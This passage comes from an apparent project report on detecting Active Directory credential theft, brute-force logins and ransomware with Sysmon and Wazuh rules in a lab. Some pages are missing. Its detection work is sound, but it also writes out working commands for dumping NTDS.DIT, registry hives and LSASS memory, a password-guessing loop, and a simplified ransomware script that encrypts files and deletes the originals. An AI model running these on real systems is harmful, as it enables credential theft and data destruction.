monitor them specifically. Another way to extract these credentials is to dump them from memory using third party tools and scripts. This means saving part of the data of a process running in the system[50]. There are multiple tools available for this, but in this project only these were used: Mimikatz, Hashdump, ProcDump, pd, Minidump. Some of these tools have the option to retrieve the password or hashes history, meaning that the attacker could gain valuable insight on the password policy of the target. There was no effort to automate these exploits because they are too simple. All the extraction programs were executed with local administrator privileges in a DC. Exploit 2.1: Retrieval of NTDS.DIT with ntdsutil Another way to get the desired information is to copy the database of the AD Domain Services (the NTDS.DIT file) and conduct an offline password audit of the domain. This means once we have this data we can use a wide selection of tools to crack it[78][79][80]. The attacker has to open a shell as administrator in a DC to create the backup. Multiple commands or an one-liner can be used: ntdsutil "activate instance ntds" ifm "create full C:\temp\ntdsutil" ,→quit quit This command creates a ntdsutil shell and activates the instance to later create a backup in a temporary directory (inside the ifm subshell). 5.2. MORE ABOUT THE EXTRACTION OF CREDENTIALS 101 Figure 5.8: Backing up the database of the AD using the ntdsutil shell There are other ways to use ntdsutil in ways harder to detect[81], but this is enough for gathering events for analysis. The creation of processes related to ntds can be reported by Sysmon: <ProcessCreate onmatch="include"> <Image condition="contains">ntdsutil</Image> <CommandLine condition="contains">ntdsutil</CommandLine> </ProcessCreate> And alerts set with Wazuh: <rule id="300010" level="0"> <if_group>windows</if_group> <match>ntds</match> <description>Potential access to ntds.dit</description> </rule> <rule id="300011" level="3"> <if_sid>300010</if_sid> <if_group>sysmon_event1</if_group> <field name="win.eventdata.commandLine">\\Windows\\System32\\ ,→ntdsutil.exe</field> <description>Use of ntdsutil</description> </rule> <rule id="300012" level="3"> 102 CHAPTER 5. INCREMENTS 1 AND 2 <if_sid>300010</if_sid> <if_group>sysmon_event1</if_group> <field name="win.eventdata.commandLine">ntds</field> <description>Potential access to ntds.dit</description> </rule> <rule id="300013" level="3"> <if_sid>300010</if_sid> <match>The database engine detached a database</match> <description>Potential access to ntds.dit</description> </rule> <rule id="300014" level="3"> <if_sid>300010</if_sid> <match>The database engine created a new database</match> <description>Potential access to ntds.dit</description> </rule> <rule id="300015" level="3"> <if_sid>300010</if_sid> <match>The database engine attached a database</match> <description>Potential access to ntds.dit</description> </rule> The first rule is the parent, it filters windows events with the ntds string. The second rule detects the ntdsutil executable. This signature is more useful than usual because it is a built-in tool. The third matches ntds for the command line, which is not really reliable. The rest are for detecting suspicious database events from Windows events. These database events assure the detection of ntdsutil even if it were to be executed without using known signatures. There is also the remote version of Reg: WinReg. But there was no time to investigate on it. It is likely that it can be detected with network monitoring, as other remote tools. Exploit 2.2: Storing registry hives with Reg These commands produce the different save files, each for a different group of credentials, that can be later extracted offline with certain tools[81]: reg.exe save hklm\sam c:\temp\sam.save reg.exe save hklm\security c:\temp\security.save reg.exe save hklm\system c:\temp\system.save Reg is not detected as malware because it is a built-in tool in Windows. With Sysmon we can report the execution of Reg with the event 1, reporting the creation of a process: 5.2. MORE ABOUT THE EXTRACTION OF CREDENTIALS 103 <ProcessCreate onmatch="include"> <Image condition="contains">reg.exe</Image> </ProcessCreate> And Wazuh to trigger an alert: <rule id="300101" level="0"> <if_group>sysmon_event1</if_group> <field name="win.eventdata.image">\\Windows\\system32\\reg.exe</ ,→field> <description>Maybe a dump of credentials with reg.exe</ ,→description> </rule> <rule id="300102" level="1"> <if_sid>300101</if_sid> <field name="win.eventdata.commandLine">save</field> <description>Dump of credentials with reg.exe</description> </rule> <rule id="300103" level="3"> <if_sid>300102</if_sid> <field name="win.eventdata.commandLine">sam</field> <description>Dump of sam credentials with reg.exe</description> </rule> <rule id="300104" level="3"> <if_sid>300102</if_sid> <field name="win.eventdata.commandLine">security</field> <description>Dump of security credentials with reg.exe</ ,→description> </rule> <rule id="300105" level="3"> <if_sid>300102</if_sid> <field name="win.eventdata.commandLine">system</field> <description>Dump of system credentials with reg.exe</ ,→description> </rule> The parent rule matches the creation of Reg from the report of Sysmon. The second rule detects the save string in the reg command. The rest of the rules detect the registry strings for credentials. This also could be detected using the event 7, but it would interfere with grouping detection. Of course it is possible that these rules do not cover all the extraction uses of Reg. It is worth noting that this is a signature base detection, therefore it could be overcome with certain third-party programs. Additionally a grouping detection for the DLLs Reg uses was tested. It detected Reg events every time without relying on the reg.exe signature, but there 104 CHAPTER 5. INCREMENTS 1 AND 2 were false positives, particularly during boot. Exploit 2.3: Dump of LSASS with ProcDump ProcDump[82] is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike. This program can be used to create a dump file of the running lsass.exe process: C:\Users\Administrator\Downloads\procdump.exe -accepteula -64 -ma ,→lsass.exe c:\temp\lsass.dmp The dumped file can be used to extract the credentials by other programs, like Mimikatz[81]. This is also true for the next exploits. Exploit 2.4: Dump of LSASS with pd ProcessDumper, also known as pd[83], is another program to dump the lsass.exe contents. For example if the id of the process is 552: C:\Users\Administrator\Downloads\pd.exe -p 552 > c:\temp\lsass.dump Exploit 2.5: Dump of LSASS with Minidump Minidump is a script from the PowerSploit Post-Explotation Framework[53]. It can be combined with the Get-Process built-in to dump the process into a file: Import-Module c:\users\administrator\downloads\PowerSploit-master\ ,→Exfiltration\Out-Minidump.ps1 Get-Process lsass | Out-Minidump -DumpFilePath c:\temp Exploit 2.6: Retrieval of NTDS.DIT with NinjaCopy Another PowerSploit module that can be used to steal the NTDS.DIT file is NinjaCopy: Import-Module C:\Users\Administrator\Downloads\PowerSploit-master\ ,→Exfiltration\Invoke-NinjaCopy.ps1 Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination ,→"c:\temp\ntds.dit" Or to copy the NTDS.DIT of the DC in this laboratory to a no-DC computer: Import-Module C:\Users\Administrator\Downloads\PowerSploit-master\ ,→Exfiltration\Invoke-NinjaCopy.ps1 Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination ,→"c:\temp\ntds.dit" -ComputerName "WIN-25U0PFAB511" 5.2. MORE ABOUT THE EXTRACTION OF CREDENTIALS 105 This module allows any file, even if it is locked, to be copied without starting suspicious services or injecting in to processes. This is because it can copy any file from a NTFS volume, by opening a read handle to the entire volume, therefore bypassing the following protections[50]: •Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives. This is known as locking the file. •Flags set on a file to alert when the file is opened. Windows can not set a flag because NinjaCopy does not use a Win32 API to open the file. The code to parse NTFS is loaded with a reflective DLL, making it harder to detect because it does not use the Windows loader nor a DLL file. The direct read of the device can be reported with the event 9 of Sysmon, but event 1 can be useful to make sure in the remote case. This needs to be included in the configuration file of Sysmon in the DC: <ProcessCreate onmatch="include"> <Image condition="contains">wsmprovhost.exe</Image> </ProcessCreate> <RawAccessRead onmatch="include"> <Image condition="contains">powershell.exe</Image> <Image condition="contains">wsmprovhost.exe</Image> </RawAccessRead> <rule id="300350" level="3"> <if_group>sysmon_event9</if_group> <field name="win.eventdata.image">powershell.exe</field> <field name="win.eventdata.device">Device\\HarddiskVolume</field ,→> <description>Maybe NinjaCopy</description> </rule> <rule id="300351" level="1"> <if_group>sysmon_event1</if_group> <field name="win.eventdata.commandLine">wsmprovhost.exe - ,→Embedding</field> <field name="win.eventdata.parentCommandLine">svchost.exe -k ,→DcomLaunch -p</field> <description>Maybe Remote NinjaCopy into the DC</description> </rule> <rule id="300352" level="1"> <if_group>sysmon_event9</if_group> <field name="win.eventdata.image">wsmprovhost.exe</field> 106 CHAPTER 5. INCREMENTS 1 AND 2 <field name="win.eventdata.device">Device\\HarddiskVolume</field ,→> <description>Maybe Remote NinjaCopy into the DC</description> </rule> <rule id="300353" level="3" timeframe="15" frequency="3" > <same_field>win.system.computer</same_field> <if_matched_sid>300351</if_matched_sid> <if_matched_sid>300352</if_matched_sid> <description>Remote NinjaCopy into the DC</description> </rule> Listing 5.12: Rules for detecting NinjaCopy The local case only generates an event of type 9 and its only signatures are PowerShell and Device\HarddiskVolume. It does not even record the name of the file because the handle is for the volume. This can not really guarantee this event comes from the execution of NinjaCopy, but until now has always worked and never reported a false positive. This rule could be much more useful if the NTDS.DIT file were in a different volume than usual. The remote case is much easier to detect. In the tests it spawned at least 4 events of each type in about 12 seconds, all from the DC. The bigger the NTDS.DIT file and the slower the connection the more events are produced. The remote command is executed by the wsmprovhost program, which stands for Windows Remote PowerShell Session. The contents of the logs of the event type 1 are easy to distinguish from normal, due to the constant value of the commandLine and parentCommandLine fields. The second and third rules detect the events of type 1 and 9 for the remote execution, and the last rule is a grouping rule of these two. This assures there are no false positives, but the second rule matches the exploit so well that it could be left out and probably would never cause false positives. If the remote command is executed from DC and set to copy from the same computer it still triggers the remote alert. Grouping the DLLs loaded by the Import-Module command probed to be effective. As with Mimikatz, this loads the DLLs needed for NinjaCopy to work, which can be registered by the event 7 of Sysmon: <ImageLoad onmatch="include"> <ImageLoaded condition="contains">mintdh.dll</ImageLoaded> <ImageLoaded condition="contains">wshext.dll</ImageLoaded> <ImageLoaded condition="contains">msisip.dll</ImageLoaded> <ImageLoaded condition="contains">pwrshsip.dll</ImageLoaded> <ImageLoaded condition="contains">OpcServices.dll</ImageLoaded> <ImageLoaded condition="contains">AppxSip.dll</ImageLoaded> <ImageLoaded condition="contains">tdh.dll</ImageLoaded> 5.2. MORE ABOUT THE EXTRACTION OF CREDENTIALS 107 <ImageLoaded condition="contains">xmllite.dll</ImageLoaded> </ImageLoad> These 8 DLLs are detected by 4 rules to reach the minimum frequency: <rule id="300330" level="0" > <if_group>sysmon_event7</if_group> <field name="win.eventdata.imageLoaded">\\Windows\\system32\\</ ,→field> <field name="win.eventdata.image">powershell.exe</field> <description>Detected one of two suspicius DLLs</description> </rule> <rule id="300331" level="1" > <if_sid>300330</if_sid> <field name="win.eventdata.imageLoaded">msisip.dll|wshext.dll</ ,→field> <description>Detected one of two suspicius DLLs</description> </rule> <rule id="300332" level="1" > <if_sid>300330</if_sid> <field name="win.eventdata.imageLoaded">AppxSip.dll|OpcServices. ,→dll</field> <description>Detected one of two suspicius DLLs</description> </rule> <rule id="300333" level="1" > <if_sid>300330</if_sid> <field name="win.eventdata.imageLoaded">mintdh.dll| ,→WindowsPowerShell\\v1.0\\pwrshsip.dll</field> <description>Detected one of two suspicius DLLs</description> </rule> <rule id="300334" level="1" > <if_sid>300330</if_sid> <field name="win.eventdata.imageLoaded">tdh.dll|xmllite.dll</ ,→field> <description>Detected one of two suspicius DLLs</description> </rule> <rule id="300340" level="3" timeframe="3" frequency="2" > <same_field>win.system.computer</same_field> <if_matched_sid>300331</if_matched_sid> <if_matched_sid>300332</if_matched_sid> <if_matched_sid>300333</if_matched_sid> <if_matched_sid>300334</if_matched_sid> <description>Maybe NinjaCopy: DLLs with EventID 7</description> </rule> This detection works the same with both local and remote cases. False positives were found when attempting to log in remotely multiple consecu- 108 CHAPTER 5. INCREMENTS 1 AND 2 tive times, as described on the part about brute force reverse logins on page 118. Others may appear in a real environment. This technique depends too much on the time frame and can be avoided changing the code. 5.2.2 Detection of process accessing LSASS The event 10 of Sysmon reports when a process access another process, possibly detecting hacking tools that read the memory contents of processes[23]. This event can be used to detect LSASS dumps[84]. The downside is it can generate significant amounts of logging, therefore it was configured to log only the LSASS process and exclude the instances from the OSSEC agent and the Virtual Box service. <ProcessAccess onmatch="include"> <TargetImage condition="contains">C:\Windows\System32\lsass.exe< ,→/TargetImage> </ProcessAccess> <ProcessAccess onmatch="exclude"> <SourceImage condition="contains">C:\Windows\System32\ ,→vboxservice.exe</SourceImage> <SourceImage condition="contains">C:\Program Files (x86)\ossec- ,→agent\ossec-agent.exe</SourceImage> </ProcessAccess> Listing 5.13: Sysmon monitoring with event 10 for LSASS reads After some analysis of these events it was clear that normal accesses could be identified by the grantedAccess field. Its value is a mask, that indicates the type of privileges the process is accessed with. They had a value of 0x3000 (even though these do not happen often) or 0x1000 if the process is svchost.exe. The detected malicious programs produced at least one event with a different value on this field. <rule id="300310" level="0" > <if_group>sysmon_event_10</if_group> <field name="win.eventdata.targetImage">\\Windows\\system32\\ ,→lsass.exe</field> <description>Detected event 10 with \Windows\system32\lsass.exe< ,→/description> </rule> <rule id="300311" level="3" > <if_sid>300310</if_sid> <field name="win.eventdata.callTrace">UNKNOWN</field> <description>Suspicius access of LSASS, probably from a ,→reverse_tcp shell</description> </rule> 5.2. MORE ABOUT THE EXTRACTION OF CREDENTIALS 109 <rule id="300312" level="0" > <if_sid>300310</if_sid> <field name="win.eventdata.grantedAccess">ˆ0x3000$</field> <description>Normal access of LSASS</description> </rule> <rule id="300313" level="0" > <if_sid>300310</if_sid> <field name="win.eventdata.grantedAccess">ˆ0x1000$</field> <field name="win.eventdata.sourceImage">\\Windows\\system32\\ ,→svchost.exe</field> <description>Normal access of LSASS</description> </rule> <rule id="300314" level="3" > <if_sid>300310</if_sid> <field name="win.eventdata.grantedAccess">ˆ0x\w+</field> <description>Suspicius access of LSASS</description> </rule> Listing 5.14: Rules to detect unusual values of grantedAccess The first rule identifies events of type 10 for the LSASS process. The second rule triggers if the string UNKNOWN is in the field callTrace. This occurrence was found during testing of the exploits 1.4 and 1.5, that use a reverse TCP shell to connect to their target. This rule causes false positives with the Minidump command and it is possible that it would cause false positives on a real network. The third and fourth rules match the normal cases, excluding them from the detection of the last rule. The last rule uses a regular expression to match any hexadecimal value of grantedAccess, therefore detecting any unusual value, because all normal logs have been identified as normal at this point. The results might change with the size of the database, the status of the system and the version of the system and the programs. All the exploits used until this point were tested, resulting in a 100% rate for those who dump the LSASS. 116 CHAPTER 5. INCREMENTS 1 AND 2 One of the frameworks that can be used for this is PS>Attack[87]. It includes many offensive PowerShell tools that rely on this DLL to bypass possible locks. The PowerShell tools are encrypted to avoid signature matching and are decrypted to memory at run-time[86]. The tool tested was Invoke-Mimikatz, which was previously used in order to test the detection of Mimikatz in 5.1.1. PS>Attack just needs to run the executable and call this module with the desired options. With the PowerShell script block logging this execution gets registered in plain text (with slight format issues). This probes that bypassing powershell.exe locks and command encryption can be detected with script block logging. The event IDs generated by running the executable and the module are 4104, 4105 and 4106. The most useful seemed to be 4104 because it includes the rebuild code from the blocks. Next the Wazuh manager needs to be configured to forward the PowerShell log to him from the agents C.55. 5.3. MORE ABOUT POWERSHELL 117 Figure 5.9: Part of PSAttack events in the archives log 118 CHAPTER 5. INCREMENTS 1 AND 2 5.3.4 Conclusion PowerShell can be very dangerous for the security of Windows systems: it can do almost anything and it has multiple ways to avoid being detected. These include encoding, encryption, reflective DLL loading and bypassing locks on executables. All of them have been shown in this project, along with mitigation and/or detection techniques. In this section we have only scratched the surface of PowerShell auditing. It would be interesting to have more time for this topic. 5.4 Detection of suspicious logins In Windows there are multiple ways to login remotely, but all of them rely on the same authentication method. Depending on its success or failure certain security events are issued. Therefore it does not make sense to have multiple ways to reproduce these attacks, as with the previous cases. In all these cases the code is run on the no-DC, which authenticates against the DC, using the built-in command winrs[88]. Here this command is used to specify the remote computer to log in, the user, the password and the command to run after a successful authentication, in that order. Usually this would use a dictionary of common passwords to be mixed with other characters, depending on the password requirements of the AD. To simplify its emulation, the same passwords were tried all the time. In this section the essential non-functional requirements RNF-03, RNF-04 and RNF-05 are covered. 5.4.1 Reverse brute force login attempts In this case the attacker tries to login guessing the password without changing his IP address. He hopes that this goes on undetected because the logins are against different accounts. This can be reproduced with a very simple loop: For ($i = 0; $i -le 3; $i+=1) { winrs -r:WIN-25U0PFAB511.wazuh.local -u:Administrator -p:’Password ,→?’ whoami winrs -r:WIN-25U0PFAB511.wazuh.local -u:fserver -p:’Password?’ ,→whoami winrs -r:WIN-25U0PFAB511.wazuh.local -u:w10 -p:’Password?’ whoami } Fortunately Wazuh already has rules for this in 0580-win-security rules.xml[89]. 5.4. DETECTION OF SUSPICIOUS LOGINS 119 Failed logins are identified by the rule 60104, which is triggered by the security event 4771[90]. Grouping is used by the rule 60205 to trigger another alert with a higher level, if there are at least 8 in 240 seconds from the same IP address. The value of the MS FREQ variable is set to 8 in this file. <rule id="60205" level="10" frequency="$MS_FREQ" timeframe="240"> <if_matched_sid>60104</if_matched_sid> <same_field>win.eventdata.ipAddress</same_field> <description>Multiple Windows audit failure events</description> <options>no_full_log</options> <group>pci_dss_10.6.1,gdpr_IV_35.7.d,</group> </rule> Listing 5.16: Rule 60205 of Wazuh 5.4.2 Distributed brute force login attempts Instead of changing the user the attacker changes his IP address every few attempts. In this case it is not so much a matter of not being detected, but of not getting temporarily banned by IP address, which usually results in a drop of received packages by the firewall of the network. Usually the attacker would connect from outside of the network, because once inside it would be hundreds of orders of magnitude faster to crack them from a file with credentials. Instead of changing the IP address of the interface he would change where his remote command comes from, usually using a Virtual Private Network paid service, an anonymity network or previously compromised victims. Both cases provide multiple servers across the world and it is trivial to write a shell command to jump from one to the next. The example script C.7 is mostly about automation to change the IP address for the internal network, which has the interface connected to the wazuh.local domain. Administrator privileges were required to change the IP address successfully. The sleep was found to be an effective measure to avoid trying to log in before the domain was reconnected. The rule 60205 in Wazuh only works for failed attempts coming from the same IP address, therefore it fails to detect this. A similar rule can solve this, just by checking the same user is targeted and by changing the same field requirement to not same field for the IP address: <rule id="110001" level="3" frequency="5" timeframe="300"> <if_matched_sid>60104</if_matched_sid> <not_same_field>win.eventdata.ipAddress</not_same_field> <same_field>win.eventdata.targetUserName</same_field> 120 CHAPTER 5. INCREMENTS 1 AND 2 <description>Multiple Windows audit failure events with ,→different IPs</description> <options>no_full_log</options> <group>pci_dss_10.6.1,gdpr_IV_35.7.d,</group> </rule> Listing 5.17: Rule 60205 of Wazuh This frequency is fine for testing in a laboratory with an internal network, but probably is way too low for a real environment. Wazuh can be used to ban the IP for a time with its active response feature[91]. 5.4.3 Login outside of usual hours Allowed logon hours can be set with AD, resulting in failure even with correct passwords when outside of the time range. Even so we can not always rely in it and there are situations where it is interesting to monitor if there are attempts to log in on unusual hours. For example an attacker would want to breach the network when there is a lesser chance of being detected, for example when the security staff is asleep. In this case we take interest in detecting these events for users of a certain Organizational Unit, which are useful for AD management. Doing this purely with OSSEC rules would need some hacks to change the code of the rules and restart the manager, for every time the users in the OU change. Because this changes are possible and because the security events do not report if the user belongs to an OU, we can consider these rules to be like variables. A workaround would be to name the users with a part of the name of the OU, like OU1 user1, and then have rules matching any username starting with it. Of course these are not acceptable and there is a better way. Running a remote command with Wazuh we can search the security log for the events of interest, check the hour and verify if they belong to a user of the OU. As with the case of the klist detection (on page 92) a PowerShell script was created C.10 and a remote command was set C.9. The script returns JSON output with basic information about the events that met the requirements. It needs to be run as Administrator to be able to query the security log and it only needs to be in the DCs, since OU logins are made always against them. The OU name and the hour range are set in the script by hand, but could also be automated. The first part of the script gets the usernames for the OU in question into an array. The second is a function that parses the event properties, checking if the conditions are met: the hour of the event is not in the valid range (in this case [8, 17]) 5.4. DETECTION OF SUSPICIOUS LOGINS 121 and the username is in the previous array. Next the properties TargetUserName, TimeGenerated,OrganizationalUnit and EventID are set in a JSON manner. The full string is returned at the end of the function, each event in a line. The last part is about collecting the security events of interest in the last minutes and calling the function with them. In this case a 10 minute margin was set, because it takes about 5 seconds to query the log each time. The remote command was set to run every 10 minutes to match it. We take interest in the event ID 4771 for the failures and in the events 4768 (TGT request) and 4769 (TGS request) for the successes[90]. The rules C.8 in Wazuh are very simple, the first filters the events that match the format and the second just triggers for everything with an username (since the checks are done in the script). 5.4.4 Conclusion These login events are very easy to perform, but also to detect. More sophisticated methods can be used, but it is important to remember that brute force logins are not efficient when compared to offline cracking. There is always a risk of users having insecure passwords, which can be reduced by enforcing and teaching good password policies. Detecting logins in unusual hours can be hard just with OSSEC rules, but it can be solved with a remote script. Again the advantage of using an HIDS is we do not need to monitor every mean of authentication, just 3 events are enough. Combined with the already existing rules and possibilities of remote scripts, Wazuh probes to be a useful tool for management of login events. Other checks could be easily implemented, for example logins from certain IP ranges can be monitored with regular expressions for the IP field (win.eventdata.ipAddress). 122 CHAPTER 5. INCREMENTS 1 AND 2 Chapter 6 Increment 3 This increment is titled Detection/action against ransomware. It includes an introduction to ransomware, an study on simplified and real ransomware and detection and measures against it. This chapter satisfies the next non-functional requirements: RNF-06 and RNF-09. In order to understand and detect the malware we try to put ourselves in the attacker place, in some cases using scripts and tools that can be considered harmful and illegal. This is only a way to accomplish the real objective that is the detection. This behaviour is kept to a minimum, it is only done in the machines of this laboratory and no kind of harm is intended outside of this project. In this increment we assume the malware has already breached into the system and our role is to detect and mitigate it, as soon as it begins to hold hostage the system or data. It does not make sense for this project to study intrusion strategies related to ransomware, because there are too many and there is no guarantee they can be detected by an IDS. 6.1 The basics of ransomware Ransomware is a term used to describe a class of malware that is used to digitally extort victims into payment of a specific fee. It is not limited to any particular geography or operating system, and it can take action on any number of devices[92]. Once the ransom is paid the attacker should provide the instructions to restore the affected resources. The best guarantee the ransom works is because attackers are interested in keeping the pay rate as high as possible, but as an illegal activity there is no way to ensure is going to free the system and that it will not be affected again in the future (the attacker could install a backdoor). 123 124 CHAPTER 6. INCREMENT 3 Any fully functional ransomware needs[93]: •Some mean to hold a resource hostage. •An anonymous system for exchanging data with the affected system. •A ransom payment method that can not be traced back to the digital extortionist. There are two basic forms of ransomware, that are not mutually exclusive[92][93]: •Locker: They restrict access or lock users out of the system. Usually the affected system is not able to perform basic tasks, even for payment, which results in a preference of payment voucher systems. It is easy to recover from but also to implement. •Cryto: They encrypt, obfuscate, or deny access to files. Depending on the target it may search for specific directories or file extensions. In most scenarios the ransomware does not affect the critical system files or functionalities and does not deny access to the system. In general it is more sophisticated and targets systems with more robust security than locker ransomware. Both can take extra steps, like exfiltrating data or taking down any antimalware detected software. Infected systems are often used by attackers to spread the malware, for example across the network. The cybercriminal wants the victim to notice as soon as the attack is done, to get paid as fast as possible, and the most common method is sending direct messages or changing the desktop background. The next image shows a simplification of the steps of a ransomware attack. We only care for the detection of the Destruction segment, but that does not mean we can ignore the whole picture. 6.1. THE BASICS OF RANSOMWARE 125 Figure 6.1: Anatomy of a ransomware attack[92] 6.1.1 State of ransomware Ransomware is important for this project because it has gained much relevance in cybersecurity in the last years. We think understanding it better is the first step to develop detection for it. The main problems for studying ransomware is that it is illegal and sometimes it is hard to gather information. For example most of the attacks are not reported and ransomware attacks are often analyzed offline and using auditing tools like decompilers because most of the time there is no source code[93]. The growth of ransomware Next there are some estimations about the ransomware economy[94]: •There are more than 6000 dark web marketplaces selling ransomware, with 45000 products listed. •The ransomware marketplace on the dark web has grown in 2502% from 2016 to 2017. A major antimalware company states a 90% increase in detection for business and a 93% for individuals, in the same year[95]. •Some sellers of ransomware are making more than 100 thousand USD per year, just by retailing ransomware, when a legitimate software developer makes 30% less. 132 CHAPTER 6. INCREMENT 3 The first step would be the generation of the pair of RSA keys. The private key stays in the computer of the attacker and the public key is stored into the victim’s. In this case the files are named keys.pem and public.pem respectively and the length of the key is 1024 bits. The first file includes both private and public keys. The second file is generated by the second command, which extracts the public key out of the combined file keys.pem. openssl genrsa -out keys.pem 1024 openssl rsa -in keys.pem -pubout -out public.pem The next PowerShell script creates a random passphrase of letters, numbers and some special characters, which is used later for the symmetric key by the AES implementation of OpenSSL. This passphrase is ciphered with the public RSA key and saved to the file passphrase.txt. Then script loops over all the files in C:/temp/ with the .txt extension, encrypting them to AES-256 and deleting the original file when done. The openssl variable is just for convenience. $openssl=’C:\temp\openssl\bin\openssl.exe’ $DIR=’c:\temp’ $PASS=-join ((35..91) + (93..125) | Get-Random -Count 25 | % {[char] ,→$_}) #random ascii numbers to chars echo "$PASS" | ."$openssl" rsautl -encrypt -inkey public.pem -pubin ,→-out passphrase.txt Get-ChildItem "$DIR" -Filter *.txt | Foreach-Object { $file=$_.FullName $output=."$openssl" enc -aes-256-cbc -in "$file" -out "$file.enc" ,→-pass pass:"$PASS" 2>&1 if(([string]::IsNullOrEmpty($output))){ del "$file" } } Listing 6.1: Script to encrypt files and cipher the passphrase with RSA The passphrase file can be deciphered with the private key, getting the random passphrase used in the script: openssl rsautl -decrypt -in passphrase.txt -inkey keys.pem Decrypting the files can be done using the same passphrase, because AES is a symmetric algorithm. This example assumes the same value for the variables as in the encryption process: Get-ChildItem "$DIR" -Filter *.enc | Foreach-Object { 6.2. COMMON PATTERNS IN CRYPTO RANSOMWARE 133 $file=$_.FullName $dfile=$file.substring(0,$file.length-4) #removes ".enc" ."$openssl" enc -d -aes-256-cbc -in "$file" -out "$dfile" -pass ,→pass:"$PASS" } 6.2.2 Detection of crypto ransomware Next some sources for possible detection of crypto ransomware are examined. Each of these options has its pros and cons, there is no restriction for using them together (in case one fails). It is important to keep in mind that the Wazuh server is supposed to manage multiple systems, therefore scalability should be a concern and maybe only one of the solutions could be used in a real network. Windows Defender’s Controlled Folder Access Windows Defender has the option to monitor specified folders for accesses and/or modification on real-time. This feature is designed to combat the threat of ransomware. It includes the option to whitelist applications and two basic modes of operation[96]: •Audit: Just notifies about suspicious activity with the event 1124. •Block: Blocks and notifies about suspicious activity with the event 1123. These events trigger for any suspicious activity, not only for ransomware attacks, but their detection is trivial C.11. Windows Defender event log can be forwarded to Wazuh C.56, allowing to improve the protection provided by Windows Defender with Wazuh. The configuration of the whitelisted applications and the monitored directories can be managed by the Group Policy, the Windows Defender interface or the registry. Windows defender has a set of monitored folders by default and the rest are listed in Computer\HKEY LOCAL MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ProtectedFolders. Sysmon events for file changes Sysmon events can be used to monitor changes in folders too, for example monitoring the folder C:\temp\: <!--EVENT 2: FILE CREATION TIME RETROACTIVELY CHANGED IN THE ,→FILESYSTEM--> <FileCreateTime onmatch="include"> <TargetFilename condition="contains">C:\temp\</TargetFilename> 134 CHAPTER 6. INCREMENT 3 </FileCreateTime> <!--EVENT 9: RAW DISK ACCESS--> <RawAccessRead onmatch="include"> <Device condition="contains">C:\temp\</Device> </RawAccessRead> <!--EVENT 11: FILE CREATED--> <FileCreate onmatch="include"> <TargetFilename condition="contains">C:\temp\</TargetFilename> </FileCreate> Unfortunately none of the Sysmon events can detect file deletion, but they can be useful in other ways: •Event 2 could detect backdoors, which would change some key file and restore its previous creation time. It is not uncommon for ransomware to install them to extort the system in the future. Instead of relying on this event it is a safer idea to use file integrity monitoring, checking the checksum of each key file for changes. •Event 9 can be used to detect direct reading of the device, an alternative access method to avoid being detected by traditional file monitoring, like how NinjaCopy 5.2.1 was used previously to avoid existing file system security to extract administrator credentials. •Event 11 can detect the new files, which could be identified as encrypted files in some cases with active response. Depending on the directory and the Wazuh rules there may be false positives. Windows File Auditing Windows File Auditing is a security feature that can be enabled and configured for multiple folders, reporting with events [4656-4663]. Windows does not log file activity in an usual way. Instead, it logs granular file operations that require further processing. These events are usually not logged in a logical order (first the request, then the operation), making them even harder to process correctly. The next table tries to describe and show the difference between these events as simple as possible[90][97]: 6.2. COMMON PATTERNS IN CRYPTO RANSOMWARE 135 Event ID Name and description 4656 A handle to an object was requested. Logs the start of every file activity but does not guarantee that it succeeded. 4658 The handle to an object was closed. Logs the end of a file activity. 4659 A handle to an object was requested with intent to delete. Logs a failed attempt to delete. 4660 An object was deleted. Logs a delete operation. 4663 An attempt was made to access an object. Logs the specific micro operations performed as part of the activity. Table 6.1: Windows File Auditing events More detail and thought is needed to complete the previous table[90][97]: •If an operation is rejected due to not having enough privileges the only event issued is 4656. •Windows only issues the event 4663 when the operation is complete. There might be multiple 4663 events for a single handle, logging smaller operations that make up the overall action. •There are some events that do not appear in the previous range: 4657 is for registry changes and 4661 and 4662 are for AD objects. •Events 4656 and 4663 include the accesses property, which refers to the type of operation: read, write, delete. The field can include multiple values, for example a rename involves read, delete and write. The problem of this field is that it does not follow an intuitive interpretation of these types of basics operations. –WriteData implies that a file was created or modified unless a delete access was recorded for the same handle. The only way to know if it was created or if it was modified is to know if the file existed before, for example with a database. –ReadData is logged almost in every case, resulting in only being a normal read if none of the others are recorded. –Delete also includes move events. Move events do not spawn 4659 or 4660 events. •The path included in the event may be the device path, for example \\ Device\\Harddisk-Volume3\\openssl\\bin\\bftest.exe, instead of the normal volume path like c:\temp. 136 CHAPTER 6. INCREMENT 3 We can conclude that these events are not as easy to handle as they could be, but they can still be used for the detection of ransomware. Syscheck Monitoring with Wazuh Wazuh can check file changes directly checking checksum differences with the Syscheck module, this is known as File Integrity Monitoring. Each agent maintains its own database for better performance. The monitoring needs to be configured C.12 in the agent, instead of the manager. This generates Syscheck events that can be processed by rules, triggering alerts. Syscheck has many options, like files to be ignored (which can also be done with rules) or the maximum recursion level to monitor. The most interesting features of Syscheck for this project are[2]: •Real-time monitoring. It can only be set at folder level, not directly for files, but that can be worked around with ignores in fixed cases or match restrictions in rules. •Scheduled scan. Interesting from a scalability point of view for checking security settings and looking for rootkits, but not useful for immediate detection. •Immediate scan. The agent can be ordered to do a scan at any time. This is interesting to combine with active response. •The creation and deletion of files can be detected too. Comparison of the different monitoring alternatives The previous analysis is interesting but a conclusion is yet to be reached. Each of the next tables shows a simplification of the advantages and disadvantages of the examined methods: 6.2. COMMON PATTERNS IN CRYPTO RANSOMWARE 137 Advantages Disadvantages •It allows the accesses to be blocked (in Block mode). •It can detect any kind of creation, modification and deletion. •False positives are uncommon. •Provides abstraction to the end user. Windows decides which programs are legitimate. •Legitimate whitelisting. Blacklisting can be implemented with rules in Wazuh. •Fundamentally faster active response than Wazuh, which adds multiple steps to the direct response of Windows Defender in block mode. •The logs do not include the filename, just the folder path. •The logs do not explain the reason to find the event suspicious. •The logs do not detail the kind of file event (creation, modification or deletion). •It is an external program, therefore it can not be totally trusted to work on complex cases. •It is one of the most and first defensive programs targeted by attackers. •The whitelisting may need manual adjustment, for example allowing the Wazuh agent. Table 6.2: Advantages and disadvantages of file monitoring with Windows Defender Advantages Disadvantages •They can detect other malware approaches to the files. •They can not be used to detect any kind of changes. •Real malware can be hard to tell apart from false positives. Table 6.3: 